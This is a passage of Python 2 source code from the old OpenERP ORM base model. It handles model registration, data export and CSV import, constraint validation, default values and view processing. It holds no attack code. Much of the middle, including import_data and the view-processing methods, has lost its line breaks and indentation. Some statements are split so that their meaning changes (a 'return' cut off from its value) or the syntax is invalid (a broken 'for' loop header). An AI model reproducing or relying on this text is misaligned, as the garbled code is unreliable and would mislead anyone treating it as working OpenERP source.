                        for c in cls.__dict__.get(s, []):
                            exist = False
                            for c2 in range(len(new)):
                                #For _constraints, we should check field and methods as well
                                if new[c2][2]==c[2] and (new[c2][0] == c[0] \
                                        or getattr(new[c2][0],'__name__', True) == \
                                            getattr(c[0],'__name__', False)):
                                    # If new class defines a constraint with
                                    # same function name, we let it override
                                    # the old one.
                                    new[c2] = c
                                    exist = True
                                    break
                            if not exist:
                                new.append(c)
                    else:
                        new.extend(cls.__dict__.get(s, []))
                    nattr[s] = new
                # Build the combined class: current class first so it wins
                # in the MRO over the parent model's class.
                cls = type(name, (cls, parent_class), dict(nattr, _register=False))
        if not getattr(cls, '_original_module', None):
            cls._original_module = cls._module
        obj = object.__new__(cls)
        obj.__init__(pool, cr)
        return obj

    def __new__(cls):
        """Register this model.

        This doesn't create an instance but simply register the model
        as being part of the module where it is defined.
        """
        # Set the module name (e.g. base, sale, accounting, ...) on the class.
        module = cls.__module__.split('.')[0]
        if not hasattr(cls, '_module'):
            cls._module = module

        # Record this class in the list of models to instantiate for this module,
        # managed by the metaclass.
        module_model_list = MetaModel.module_to_models.setdefault(cls._module, [])
        if cls not in module_model_list:
            module_model_list.append(cls)

        # Since we don't return an instance here, the __init__
        # method won't be called.
        return None

    def __init__(self, pool, cr):
        """ Initialize a model and make it part of the given registry.

        - copy the stored fields' functions in the osv_pool,
        - update the _columns with the fields found in ir_model_fields,
        - ensure there is a many2one for each _inherits'd parent,
        - update the children's _columns,
        - give a chance to each field to initialize itself.
        """
        pool.add(self._name, self)
        self.pool = pool

        if not self._name and not hasattr(self, '_inherit'):
            name = type(self).__name__.split('.')[0]
            msg = "The class %s has to have a _name attribute" % name

            _logger.error(msg)
            raise except_orm('ValueError', msg)

        if not self._description:
            self._description = self._name
        if not self._table:
            self._table = self._name.replace('.', '_')

        if not hasattr(self, '_log_access'):
            # If _log_access is not specified, it is the same value as _auto.
            self._log_access = getattr(self, "_auto", True)

        self._columns = self._columns.copy()
        for store_field in self._columns:
            f = self._columns[store_field]
            if hasattr(f, 'digits_change'):
                f.digits_change(cr)
            # Drop any previously-registered store trigger for this exact
            # (model, field) pair before re-registering it below.
            def not_this_field(stored_func):
                x, y, z, e, f, l = stored_func
                return x != self._name or y != store_field
            self.pool._store_function[self._name] = filter(not_this_field, self.pool._store_function.get(self._name, []))
            if not isinstance(f, fields.function):
                continue
            if not f.store:
                continue
            sm = f.store
            if sm is True:
                # store=True shorthand: recompute for the written ids, prio 10.
                sm = {self._name: (lambda self, cr, uid, ids, c={}: ids, None, 10, None)}
            for object, aa in sm.items():
                if len(aa) == 4:
                    (fnct, fields2, order, length) = aa
                elif len(aa) == 3:
                    (fnct, fields2, order) = aa
                    length = None
                else:
                    raise except_orm('Error',
                        ('Invalid function definition %s in object %s !\nYou must use the definition: store={object:(fnct, fields, priority, time length)}.' % (store_field, self._name)))
                self.pool._store_function.setdefault(object, [])
                self.pool._store_function[object].append((self._name, store_field, fnct, tuple(fields2) if fields2 else None, order, length))
                # Keep triggers sorted by priority (index 4 of the tuple).
                self.pool._store_function[object].sort(lambda x, y: cmp(x[4], y[4]))

        for (key, _, msg) in self._sql_constraints:
            self.pool._sql_error[self._table+'_'+key] = msg

        # Load manual fields

        cr.execute("SELECT id FROM ir_model_fields WHERE name=%s AND model=%s", ('state', 'ir.model.fields'))
        if cr.fetchone():
            cr.execute(
                'SELECT * FROM ir_model_fields WHERE model=%s AND state=%s',
                (self._name, 'manual'))
            for field in cr.dictfetchall():
                if field['name'] in self._columns:
                    continue
                attrs = {
                    'string': field['field_description'],
                    'required': bool(field['required']),
                    'readonly': bool(field['readonly']),
                    'domain': eval(field['domain']) if field['domain'] else None,
                    'size': field['size'],
                    'ondelete': field['on_delete'],
                    'translate': (field['translate']),
                    'manual': True,
                    #'select': int(field['select_level'])
                }

                if field['serialization_field_id']:
                    cr.execute('SELECT name FROM ir_model_fields WHERE id=%s', (field['serialization_field_id'],))
                    attrs.update({'serialization_field': cr.fetchone()[0], 'type': field['ttype']})
                    if field['ttype'] in ['many2one', 'one2many', 'many2many']:
                        attrs.update({'relation': field['relation']})
                    self._columns[field['name']] = fields.sparse(**attrs)
                elif field['ttype'] == 'selection':
                    self._columns[field['name']] = fields.selection(eval(field['selection']), **attrs)
                elif field['ttype'] == 'reference':
                    self._columns[field['name']] = fields.reference(selection=eval(field['selection']), **attrs)
                elif field['ttype'] == 'many2one':
                    self._columns[field['name']] = fields.many2one(field['relation'], **attrs)
                elif field['ttype'] == 'one2many':
                    self._columns[field['name']] = fields.one2many(field['relation'], field['relation_field'], **attrs)
                elif field['ttype'] == 'many2many':
                    _rel1 = field['relation'].replace('.', '_')
                    _rel2 = field['model'].replace('.', '_')
                    _rel_name = 'x_%s_%s_%s_rel' % (_rel1, _rel2, field['name'])
                    self._columns[field['name']] = fields.many2many(field['relation'], _rel_name, 'id1', 'id2', **attrs)
                else:
                    # Fall back to the fields class named after the ttype.
                    self._columns[field['name']] = getattr(fields, field['ttype'])(**attrs)
        self._inherits_check()
        self._inherits_reload()
        if not self._sequence:
            self._sequence = self._table + '_id_seq'
        for k in self._defaults:
            assert (k in self._columns) or (k in self._inherit_fields), 'Default function defined in %s but field %s does not exist !' % (self._name, k,)
        for f in self._columns:
            self._columns[f].restart()

        # Transience
        if self.is_transient():
            self._transient_check_count = 0
            self._transient_max_count = config.get('osv_memory_count_limit')
            self._transient_max_hours = config.get('osv_memory_age_limit')
            assert self._log_access, "TransientModels must have log_access turned on, "\
                                     "in order to implement their access rights policy"

    def __export_row(self, cr, uid, row, fields, context=None):
        # Export one browse_record `row` as a list of rows: the first row
        # carries this record's values for the requested field paths, the
        # following rows carry the extra lines of one2many sub-records.
        if context is None:
            context = {}

        def check_type(field_type):
            # Placeholder value used when a field is empty.
            if field_type == 'float':
                return 0.0
            elif field_type == 'integer':
                return 0
            elif field_type == 'boolean':
                return 'False'
            return ''

        def selection_field(in_field):
            # Resolve an inherited field's column object by walking _inherits.
            # NOTE(review): the recursive branch does not `return` its result,
            # so deeper matches yield None — verify against callers.
            col_obj = self.pool.get(in_field.keys()[0])
            if f[i] in col_obj._columns.keys():
                return col_obj._columns[f[i]]
            elif f[i] in col_obj._inherits.keys():
                selection_field(col_obj._inherits)
            else:
                return False

        def _get_xml_id(self, cr, uid, r):
            # Return the record's external id, creating a '__export__.' one
            # (unique via a numeric postfix) when none exists yet.
            model_data = self.pool.get('ir.model.data')
            data_ids = model_data.search(cr, uid, [('model', '=', r._table_name), ('res_id', '=', r['id'])])
            if len(data_ids):
                d = model_data.read(cr, uid, data_ids, ['name', 'module'])[0]
                if d['module']:
                    r = '%s.%s' % (d['module'], d['name'])
                else:
                    r = d['name']
            else:
                postfix = 0
                while True:
                    n = self._table+'_'+str(r['id']) + (postfix and ('_'+str(postfix)) or '' )
                    if not model_data.search(cr, uid, [('name', '=', n)]):
                        break
                    postfix += 1
                model_data.create(cr, SUPERUSER_ID, {
                    'name': n,
                    'model': self._name,
                    'res_id': r['id'],
                    'module': '__export__',
                })
                r = '__export__.'+n
            return r

        lines = []
        data = map(lambda x: '', range(len(fields)))
        done = []
        for fpos in range(len(fields)):
            f = fields[fpos]
            if f:
                r = row
                i = 0
                # Walk the field path segment by segment.
                while i < len(f):
                    cols = False
                    if f[i] == '.id':
                        r = r['id']
                    elif f[i] == 'id':
                        r = _get_xml_id(self, cr, uid, r)
                    else:
                        r = r[f[i]]
                        # To display external name of selection field when its exported
                        if f[i] in self._columns.keys():
                            cols = self._columns[f[i]]
                        elif f[i] in self._inherit_fields.keys():
                            cols = selection_field(self._inherits)
                        if cols and cols._type == 'selection':
                            sel_list = cols.selection
                            if r and type(sel_list) == type([]):
                                r = [x[1] for x in sel_list if r==x[0]]
                                r = r and r[0] or False
                    if not r:
                        if f[i] in self._columns:
                            r = check_type(self._columns[f[i]]._type)
                        elif f[i] in self._inherit_fields:
                            r = check_type(self._inherit_fields[f[i]][2]._type)
                        data[fpos] = r or False
                        break
                    if isinstance(r, (browse_record_list, list)):
                        # x2many value: recurse into the sub-records with the
                        # remainder of the matching field paths.
                        first = True
                        fields2 = map(lambda x: (x[:i+1]==f[:i+1] and x[i+1:]) \
                                or [], fields)
                        if fields2 in done:
                            if [x for x in fields2 if x]:
                                break
                        done.append(fields2)
                        if cols and cols._type=='many2many' and len(fields[fpos])>(i+1) and (fields[fpos][i+1]=='id'):
                            data[fpos] = ','.join([_get_xml_id(self, cr, uid, x) for x in r])
                            break
                        for row2 in r:
                            lines2 = row2._model.__export_row(cr, uid, row2, fields2, context)
                            if first:
                                for fpos2 in range(len(fields)):
                                    if lines2 and lines2[0][fpos2]:
                                        data[fpos2] = lines2[0][fpos2]
                                if not data[fpos]:
                                    # No sub-field requested: export the
                                    # comma-joined display names instead.
                                    dt = ''
                                    for rr in r:
                                        name_relation = self.pool.get(rr._table_name)._rec_name
                                        if isinstance(rr[name_relation], browse_record):
                                            rr = rr[name_relation]
                                        rr_name = self.pool.get(rr._table_name).name_get(cr, uid, [rr.id], context=context)
                                        rr_name = rr_name and rr_name[0] and rr_name[0][1] or ''
                                        dt += tools.ustr(rr_name or '') + ','
                                    data[fpos] = dt[:-1]
                                    break
                                lines += lines2[1:]
                                first = False
                            else:
                                lines += lines2
                        break
                    i += 1
                if i == len(f):
                    # Reached the end of the path: render scalars / m2o names.
                    if isinstance(r, browse_record):
                        r = self.pool.get(r._table_name).name_get(cr, uid, [r.id], context=context)
                        r = r and r[0] and r[0][1] or ''
                    data[fpos] = tools.ustr(r or '')
        return [data] + lines

    def export_data(self, cr, uid, ids, fields_to_export, context=None):
        """
        Export fields for selected objects

        :param cr: database cursor
        :param uid: current user id
        :param ids: list of ids
        :param fields_to_export: list of fields
        :param context: context arguments, like lang, time zone
        :rtype: dictionary with a *datas* matrix

        This method is used when exporting data via client menu
        """
        if context is None:
            context = {}
        cols = self._columns.copy()
        for f in self._inherit_fields:
            cols.update({f: self._inherit_fields[f][2]})
        fields_to_export = map(fix_import_export_id_paths, fields_to_export)
        datas = []
        for row in self.browse(cr, uid, ids, context):
            datas += self.__export_row(cr, uid, row, fields_to_export, context)
        return {'datas': datas}

    def import_data(self, cr, uid, fields, datas, mode='init', current_module='', noupdate=False, context=None, filename=None):
        """Import given data in given module

        This method is used when importing data via client menu.
Example of fields to import for a sale.order:: .id, (=database_id) partner_id, (=name_search) order_line/.id, (=database_id) order_line/name, order_line/product_id/id, (=xml id) order_line/price_unit, order_line/product_uom_qty, order_line/product_uom/id (=xml_id) This method returns a 4-tuple with the following structure:: (return_code, errored_resource, error_message, unused) * The first item is a return code, it is ``-1`` in case of import error, or the last imported row number in case of success * The second item contains the record data dict that failed to import in case of error, otherwise it's 0 * The third item contains an error message string in case of error, otherwise it's 0 * The last item is currently unused, with no specific semantics :param fields: list of fields to import :param data: data to import :param mode: 'init' or 'update' for record creation :param current_module: module name :param noupdate: flag for record creation :param filename: optional file to store partial import state for recovery :returns: 4-tuple in the form (return_code, errored_resource, error_message, unused) :rtype: (int, dict or 0, str or 0, str or 0) """ if not context: context = {} fields = map(fix_import_export_id_paths, fields) ir_model_data_obj = self.pool.get('ir.model.data') # mode: id (XML id) or .id (database id) or False for name_get def _get_id(model_name, id, current_module=False, mode='id'): if mode=='.id': id = int(id) obj_model = self.pool.get(model_name) ids = obj_model.search(cr, uid, [('id', '=', int(id))]) if not len(ids): raise Exception(_("Database ID doesn't exist: %s : %s") %(model_name, id)) elif mode=='id': if '.' 
in id: module, xml_id = id.rsplit('.', 1) else: module, xml_id = current_module, id record_id = ir_model_data_obj._get_id(cr, uid, module, xml_id) ir_model_data = ir_model_data_obj.read(cr, uid, [record_id], ['res_id']) if not ir_model_data: raise ValueError('No references to %s.%s' % (module, xml_id)) id = ir_model_data[0]['res_id'] else: obj_model = self.pool.get(model_name) ids = obj_model.name_search(cr, uid, id, operator='=', context=context) if not ids: raise ValueError('No record found for %s' % (id,)) id = ids[0][0] return id # IN: # datas: a list of records, each record is defined by a list of values # prefix: a list of prefix fields ['line_ids'] # position: the line to process, skip is False if it's the first line of the current record # OUT: # (res, position, warning, res_id) with # res: the record for the next line to process (including it's one2many) # position: the new position for the next line # res_id: the ID of the record if it's a modification def process_liness(self, datas, prefix, current_module, model_name, fields_def, position=0, skip=0): line = datas[position] row = {} warning = [] data_res_id = False xml_id = False nbrmax = position+1 done = {} for i, field in enumerate(fields): res = False if i >= len(line): raise Exception(_('Please check that all your lines have %d columns.' 
'Stopped around line %d having %d columns.') % \ (len(fields), position+2, len(line))) if not line[i]: continue if field[:len(prefix)] <> prefix: if line[i] and skip: return False continue field_name = field[len(prefix)] #set the mode for m2o, o2m, m2m : xml_id/id/name if len(field) == len(prefix)+1: mode = False else: mode = field[len(prefix)+1] # TODO: improve this by using csv.csv_reader def many_ids(line, relation, current_module, mode): res = [] for db_id in line.split(config.get('csv_internal_sep')): res.append(_get_id(relation, db_id, current_module, mode)) return [(6,0,res)] # ID of the record using a XML ID if field_name == 'id': try: data_res_id = _get_id(model_name, line[i], current_module) except ValueError: pass xml_id = line[i] continue # ID of the record using a database ID elif field_name == '.id': data_res_id = _get_id(model_name, line[i], current_module, '.id') continue field_type = fields_def[field_name]['type'] # recursive call for getting children and returning [(0,0,{})] or [(1,ID,{})] if field_type == 'one2many': if field_name in done: continue done[field_name] = True relation = fields_def[field_name]['relation'] relation_obj = self.pool.get(relation) newfd = relation_obj.fields_get( cr, uid, context=context ) pos = position res = [] first = 0 while pos < len(datas): res2 = process_liness(self, datas, prefix + [field_name], current_module, relation_obj._name, newfd, pos, first) if not res2: break (newrow, pos, w2, data_res_id2, xml_id2) = res2 nbrmax = max(nbrmax, pos) warning += w2 first += 1 if (not newrow) or not reduce(lambda x, y: x or y, newrow.values(), 0): break res.append( (data_res_id2 and 1 or 0, data_res_id2 or 0, newrow) ) elif field_type == 'many2one': relation = fields_def[field_name]['relation'] res = _get_id(relation, line[i], current_module, mode) elif field_type == 'many2many': relation = fields_def[field_name]['relation'] res = many_ids(line[i], relation, current_module, mode) elif field_type == 'integer': res = line[i] 
                    and int(line[i]) or 0
                elif field_type == 'boolean':
                    # anything except these literal strings counts as True
                    res = line[i].lower() not in ('0', 'false', 'off')
                elif field_type == 'float':
                    res = line[i] and float(line[i]) or 0.0
                elif field_type == 'selection':
                    # accept either the stored key or the human-readable label
                    for key, val in fields_def[field_name]['selection']:
                        if tools.ustr(line[i]) in [tools.ustr(key), tools.ustr(val)]:
                            res = key
                            break
                    if line[i] and not res:
                        # unknown selection value: warn but keep importing the row
                        _logger.warning(
                            _("key '%s' not found in selection field '%s'"),
                            tools.ustr(line[i]), tools.ustr(field_name))
                        warning.append(_("Key/value '%s' not found in selection field '%s'") % (
                            tools.ustr(line[i]), tools.ustr(field_name)))
                else:
                    # char/text and other scalar types are imported verbatim
                    res = line[i]
                row[field_name] = res or False
            return row, nbrmax, warning, data_res_id, xml_id

        fields_def = self.fields_get(cr, uid, context=context)

        # Resume a previously interrupted import if a partial-import state
        # file was configured and already contains a position for `filename`.
        position = 0
        if config.get('import_partial') and filename:
            with open(config.get('import_partial'), 'rb') as partial_import_file:
                data = pickle.load(partial_import_file)
                position = data.get(filename, 0)

        # Main import loop: consume `datas` record by record (a record may
        # span several csv lines because of one2many sub-rows).
        while position < len(datas):
            (res, position, warning, res_id, xml_id) = \
                    process_liness(self, datas, [], current_module, self._name, fields_def, position=position)
            if len(warning):
                # any warning aborts the whole import and rolls back
                cr.rollback()
                return -1, res, 'Line ' + str(position) +' : ' + '!\n'.join(warning), ''

            try:
                ir_model_data_obj._update(cr, uid, self._name,
                     current_module, res, mode=mode, xml_id=xml_id,
                     noupdate=noupdate, res_id=res_id, context=context)
            except Exception, e:
                # report the failing line number and the error text to the caller
                return -1, res, 'Line ' + str(position) + ' : ' + tools.ustr(e), ''

            # Checkpoint every 100 records: persist the current position so a
            # crashed import can be resumed, then commit the work so far.
            if config.get('import_partial') and filename and (not (position % 100)):
                with open(config.get('import_partial'), 'rb') as partial_import:
                    data = pickle.load(partial_import)
                data[filename] = position
                with open(config.get('import_partial'), 'wb') as partial_import:
                    pickle.dump(data, partial_import)
                if context.get('defer_parent_store_computation'):
                    self._parent_store_compute(cr)
                cr.commit()

        if context.get('defer_parent_store_computation'):
            self._parent_store_compute(cr)
        return position, 0, 0, 0

    def get_invalid_fields(self, cr, uid):
        # Fields that failed the last _validate() pass (see self._invalids).
        return
            list(self._invalids)

    def _validate(self, cr, uid, ids, context=None):
        """Run all python constraints in self._constraints over ``ids``.

        Collects the (possibly translated) messages of every failing
        constraint and raises a single except_orm listing them all; on
        failure the cursor is rolled back and the offending field names are
        remembered in ``self._invalids``.
        """
        context = context or {}
        lng = context.get('lang', False) or 'en_US'
        trans = self.pool.get('ir.translation')
        error_msgs = []
        for constraint in self._constraints:
            # each constraint is (checker_function, message, [field_names])
            fun, msg, fields = constraint
            if not fun(self, cr, uid, ids):
                # Check presence of __call__ directly instead of using
                # callable() because it will be deprecated as of Python 3.0
                if hasattr(msg, '__call__'):
                    # dynamic message: may return a plain string or a
                    # (format_string, params) tuple
                    tmp_msg = msg(self, cr, uid, ids, context=context)
                    if isinstance(tmp_msg, tuple):
                        tmp_msg, params = tmp_msg
                        translated_msg = tmp_msg % params
                    else:
                        translated_msg = tmp_msg
                else:
                    # static message: look it up in the translation table
                    translated_msg = trans._get_source(cr, uid, self._name, 'constraint', lng, msg) or msg
                error_msgs.append(
                        _("Error occurred while validating the field(s) %s: %s") % (','.join(fields), translated_msg)
                )
                self._invalids.update(fields)
        if error_msgs:
            cr.rollback()
            raise except_orm('ValidateError', '\n'.join(error_msgs))
        else:
            self._invalids.clear()

    def default_get(self, cr, uid, fields_list, context=None):
        """
        Returns default values for the fields in fields_list.

        :param fields_list: list of fields to get the default values for (example ['field1', 'field2',])
        :type fields_list: list
        :param context: optional context dictionary - it may contains keys for specifying certain options
                        like ``context_lang`` (language) or ``context_tz`` (timezone) to alter the results of the call.
                        It may contain keys in the form ``default_XXX`` (where XXX is a field name), to set
                        or override a default value for a field.
                        A special ``bin_size`` boolean flag may also be passed in the context to request the
                        value of all fields.binary columns to be returned as the size of the binary instead of its
                        contents. This can also be selectively overriden by passing a field-specific flag
                        in the form ``bin_size_XXX: True/False`` where ``XXX`` is the name of the field.
                        Note: The ``bin_size_XXX`` form is new in OpenERP v6.0.
        :return: dictionary of the default values (set on the object model class, through user preferences, or in the context)
        """
        # trigger view init hook
        self.view_init(cr, uid, fields_list, context)

        if not context:
            context = {}
        defaults = {}

        # get the default values for the inherited fields (lowest priority:
        # later sources below overwrite these entries)
        for t in self._inherits.keys():
            defaults.update(self.pool.get(t).default_get(cr, uid, fields_list, context))

        # get the default values defined in the object
        for f in fields_list:
            if f in self._defaults:
                # a default may be a callable or a plain value
                if callable(self._defaults[f]):
                    defaults[f] = self._defaults[f](self, cr, uid, context)
                else:
                    defaults[f] = self._defaults[f]

            # column definition: own column first, then inherited column
            fld_def = ((f in self._columns) and self._columns[f]) \
                    or ((f in self._inherit_fields) and self._inherit_fields[f][2]) \
                    or False

            if isinstance(fld_def, fields.property):
                # property fields fetch their default from ir.property
                property_obj = self.pool.get('ir.property')
                prop_value = property_obj.get(cr, uid, f, self._name, context=context)
                if prop_value:
                    if isinstance(prop_value, (browse_record, browse_null)):
                        defaults[f] = prop_value.id
                    else:
                        defaults[f] = prop_value
                else:
                    if f not in defaults:
                        defaults[f] = False

        # get the default values set by the user and override the default
        # values defined in the object
        ir_values_obj = self.pool.get('ir.values')
        res = ir_values_obj.get(cr, uid, 'default', False, [self._name])
        for id, field, field_value in res:
            if field in fields_list:
                fld_def = (field in self._columns) and self._columns[field] or self._inherit_fields[field][2]
                if fld_def._type in ('many2one', 'one2one'):
                    # drop the stored default if the target record was deleted
                    obj = self.pool.get(fld_def._obj)
                    if not obj.search(cr, uid, [('id', '=', field_value or False)]):
                        continue
                if fld_def._type in ('many2many'):
                    # keep only target ids that still exist
                    obj = self.pool.get(fld_def._obj)
                    field_value2 = []
                    for i in range(len(field_value)):
                        if not obj.search(cr, uid, [('id', '=', field_value[i])]):
                            continue
                        field_value2.append(field_value[i])
                    field_value = field_value2
                if fld_def._type in ('one2many'):
                    # rebuild each sub-record dict, dropping dangling m2o refs
                    obj = self.pool.get(fld_def._obj)
                    field_value2 = []
                    for i in range(len(field_value)):
                        field_value2.append({})
                        for field2
                        in field_value[i]:
                            # validate many2one/one2one sub-values: skip ids
                            # whose target record no longer exists
                            if field2 in obj._columns.keys() and obj._columns[field2]._type in ('many2one', 'one2one'):
                                obj2 = self.pool.get(obj._columns[field2]._obj)
                                if not obj2.search(cr, uid, [('id', '=', field_value[i][field2])]):
                                    continue
                            elif field2 in obj._inherit_fields.keys() and obj._inherit_fields[field2][2]._type in ('many2one', 'one2one'):
                                obj2 = self.pool.get(obj._inherit_fields[field2][2]._obj)
                                if not obj2.search(cr, uid, [('id', '=', field_value[i][field2])]):
                                    continue
                            # TODO add test for many2many and one2many
                            field_value2[i][field2] = field_value[i][field2]
                    field_value = field_value2
                defaults[field] = field_value

        # get the default values from the context (highest priority:
        # ``default_XXX`` context keys override everything above)
        for key in context or {}:
            if key.startswith('default_') and (key[8:] in fields_list):
                defaults[key[8:]] = context[key]

        return defaults

    def fields_get_keys(self, cr, user, context=None):
        # All field names of this model, including inherited (_inherits) ones.
        res = self._columns.keys()
        # TODO I believe this loop can be replace by
        # res.extend(self._inherit_fields.key())
        for parent in self._inherits:
            res.extend(self.pool.get(parent).fields_get_keys(cr, user, context))
        return res

    #
    # Overload this method if you need a window title which depends on the context
    #
    def view_header_get(self, cr, user, view_id=None, view_type='form', context=None):
        return False

    def __view_look_dom(self, cr, user, node, view_id, in_tree_view, model_fields, context=None):
        """ Return the description of the fields in the node.

        In a normal call to this method, node is a complete view architecture
        but it is actually possible to give some sub-node (this is used so
        that the method can call itself recursively).

        Originally, the field descriptions are drawn from the node itself.
        But there is now some code calling fields_get() in order to merge some
        of those information in the architecture.
""" if context is None: context = {} result = False fields = {} children = True modifiers = {} def encode(s): if isinstance(s, unicode): return s.encode('utf8') return s def check_group(node): """ Set invisible to true if the user is not in the specified groups. """ if node.get('groups'): groups = node.get('groups').split(',') ir_model_access = self.pool.get('ir.model.access') can_see = any(ir_model_access.check_groups(cr, user, group) for group in groups) if not can_see: node.set('invisible', '1') modifiers['invisible'] = True if 'attrs' in node.attrib: del(node.attrib['attrs']) #avoid making field visible later del(node.attrib['groups']) if node.tag in ('field', 'node', 'arrow'): if node.get('object'): attrs = {} views = {} xml = "<form>" for f in node: if f.tag in ('field'): xml += etree.tostring(f, encoding="utf-8") xml += "</form>" new_xml = etree.fromstring(encode(xml)) ctx = context.copy() ctx['base_model_name'] = self._name xarch, xfields = self.pool.get(node.get('object')).__view_look_dom_arch(cr, user, new_xml, view_id, ctx) views['form'] = { 'arch': xarch, 'fields': xfields } attrs = {'views': views} fields = xfields if node.get('name'): attrs = {} try: if node.get('name') in self._columns: column = self._columns[node.get('name')] else: column = self._inherit_fields[node.get('name')][2] except Exception: column = False if column: relation = self.pool.get(column._obj) children = False views = {} for f in node: if f.tag in ('form', 'tree', 'graph'): node.remove(f) ctx = context.copy() ctx['base_model_name'] = self._name xarch, xfields = relation.__view_look_dom_arch(cr, user, f, view_id, ctx) views[str(f.tag)] = { 'arch': xarch, 'fields': xfields } attrs = {'views': views} if node.get('widget') and node.get('widget') == 'selection': # Prepare the cached selection list for the client. 
This needs to be # done even when the field is invisible to the current user, because # other events could need to change its value to any of the selectable ones # (such as on_change events, refreshes, etc.) # If domain and context are strings, we keep them for client-side, otherwise # we evaluate them server-side to consider them when generating the list of # possible values # TODO: find a way to remove this hack, by allow dynamic domains dom = [] if column._domain and not isinstance(column._domain, basestring): dom = column._domain dom = dom + eval(node.get('domain', '[]'), {'uid': user, 'time': time}) search_context = dict(context) if column._context and not isinstance(column._context, basestring): search_context.update(column._context) attrs['selection'] = relation._name_search(cr, user, '', dom, context=search_context, limit=None, name_get_uid=1) if (node.get('required') and not int(node.get('required'))) or not column.required: attrs['selection'].append((False, '')) fields[node.get('name')] = attrs field = model_fields.get(node.get('name')) if field: transfer_field_to_modifiers(field, modifiers) elif node.tag in ('form', 'tree'): result = self.view_header_get(cr, user, False, node.tag, context) if result: node.set('string', result) in_tree_view = node.tag == 'tree' elif node.tag == 'calendar': for additional_field in ('date_start', 'date_delay', 'date_stop', 'color'): if node.get(additional_field): fields[node.get(additional_field)] = {} check_group(node) # The view architeture overrides the python model. # Get the attrs before they are (possibly) deleted by check_group below transfer_node_to_modifiers(node, modifiers, context, in_tree_view) # TODO remove attrs couterpart in modifiers when invisible is true ? 
# translate view if 'lang' in context: if node.get('string') and not result: trans = self.pool.get('ir.translation')._get_source(cr, user, self._name, 'view', context['lang'], node.get('string')) if trans == node.get('string') and ('base_model_name' in context): # If translation is same as source, perhaps we'd have more luck with the alternative model name # (in case we are in a mixed situation, such as an inherited view where parent_view.model != model trans = self.pool.get('ir.translation')._get_source(cr, user, context['base_model_name'], 'view', context['lang'], node.get('string')) if trans: node.set('string', trans) if node.get('confirm'): trans = self.pool.get('ir.translation')._get_source(cr, user, self._name, 'view', context['lang'], node.get('confirm')) if trans: node.set('confirm', trans) if node.get('sum'): trans = self.pool.get('ir.translation')._get_source(cr, user, self._name, 'view', context['lang'], node.get('sum')) if trans: node.set('sum', trans) if node.get('avg'): trans = self.pool.get('ir.translation')._get_source(cr, user, self._name, 'view', context['lang'], node.get('avg')) if trans: node.set('avg', trans) if node.get('help'): trans = self.pool.get('ir.translation')._get_source(cr, user, self._name, 'view', context['lang'], node.get('help')) if trans: node.set('help', trans) for f in node: if children or (node.tag == 'field' and f.tag in ('filter','separator')): fields.update(self.__view_look_dom(cr, user, f, view_id, in_tree_view, model_fields, context)) transfer_modifiers_to_node(modifiers, node) return fields def _disable_workflow_buttons(self, cr, user, node): """ Set the buttons in node to readonly if the user can't activate them. 
""" if user == 1: # admin user can always activate workflow buttons return node # TODO handle the case of more than one workflow for a model or multiple # transitions with different groups and same signal usersobj = self.pool.get('res.users') buttons = (n for n in node.getiterator('button') if n.get('type') != 'object') for button in buttons: user_groups = usersobj.read(cr, user, [user], ['groups_id'])[0]['groups_id'] cr.execute("""SELECT DISTINCT t.group_id FROM wkf INNER JOIN wkf_activity a ON a.wkf_id = wkf.id INNER JOIN wkf_transition t ON (t.act_to = a.id) WHERE wkf.osv = %s AND t.signal = %s AND t.group_id is NOT NULL """, (self._name, button.get('name'))) group_ids = [x[0] for x in cr.fetchall() if x[0]] can_click = not group_ids or bool(set(user_groups).intersection(group_ids)) button.set('readonly', str(int(not can_click))) return node def __view_look_dom_arch(self, cr, user, node, view_id, context=None): """ Return an architecture and a description of all the fields. The field description combines the result of fields_get() and __view_look_dom(). :param node: the architecture as as an etree :return: a tuple (arch, fields) where arch is the given node as a string and fields is the description of all the fields. 
""" fields = {} if node.tag == 'diagram': if node.getchildren()[0].tag == 'node': node_fields = self.pool.get(node.getchildren()[0].get('object')).fields_get(cr, user, None, context) fields.update(node_fields) if node.getchildren()[1].tag == 'arrow': arrow_fields = self.pool.get(node.getchildren()[1].get('object')).fields_get(cr, user, None, context) fields.update(arrow_fields) else: fields = self.fields_get(cr, user, None, context) fields_def = self.__view_look_dom(cr, user, node, view_id, False, fields, context=context) node = self._disable_workflow_buttons(cr, user, node) arch = etree.tostring(node, encoding="utf-8").replace('\t', '') for k in fields.keys(): if k not in fields_def: del fields[k] for field in fields_def: if field == 'id': # sometime, the view may contain the (invisible) field 'id' needed for a domain (when 2 objects have cross references) fields['id'] = {'readonly': True, 'type': 'integer', 'string': 'ID'} elif field in fields: fields[field].update(fields_def[field]) else: cr.execute('select name, model from ir_ui_view where (id=%s or inherit_id=%s) and arch like %s', (view_id, view_id, '%%%s%%' % field)) res = cr.fetchall()[:] model = res[0][1] res.insert(0, ("Can't find field '%s' in the following view parts composing the view of object model '%s':" % (field, model), None)) msg = "\n * ".join([r[0] for r in res]) msg += "\n\nEither you wrongly customized this view, or some modules bringing those views are not compatible with your current data model" _logger.error(msg) raise except_orm('View error', msg) return arch, fields def _get_default_form_view(self, cr, user, context=None): """ Generates a default single-line form view using all fields of the current model except the m2m and o2m ones. 
        :param cr: database cursor
        :param int user: user id
        :param dict context: connection context
        :returns: a form view as an lxml document
        :rtype: etree._Element
        """
        view = etree.Element('form', string=self._description)
        # TODO it seems fields_get can be replaced by _all_columns (no need for translation)
        for field, descriptor in self.fields_get(cr, user, context=context).iteritems():
            if descriptor['type'] in ('one2many', 'many2many'):
                continue
            etree.SubElement(view, 'field', name=field)
            if descriptor['type'] == 'text':
                # text widgets take the full width; start a new row after them
                etree.SubElement(view, 'newline')
        return view

    def _get_default_tree_view(self, cr, user, context=None):
        """ Generates a single-field tree view, using _rec_name if
        it's one of the columns or the first column it finds otherwise

        :param cr: database cursor
        :param int user: user id
        :param dict context: connection context
        :returns: a tree view as an lxml document
        :rtype: etree._Element
        """
        _rec_name = self._rec_name
        if _rec_name not in self._columns:
            # fall back to any column, or 'id' for a column-less model
            _rec_name = self._columns.keys()[0] if len(self._columns.keys()) > 0 else "id"

        view = etree.Element('tree', string=self._description)
        etree.SubElement(view, 'field', name=_rec_name)
        return view

    def _get_default_calendar_view(self, cr, user, context=None):
        """ Generates a default calendar view by trying to infer
        calendar fields from a number of pre-set attribute names

        :param cr: database cursor
        :param int user: user id
        :param dict context: connection context
        :returns: a calendar view
        :rtype: etree._Element
        """
        def set_first_of(seq, in_, to):
            """Sets the first value of ``seq`` also found in ``in_`` to
            the ``to`` attribute of the view being closed over.
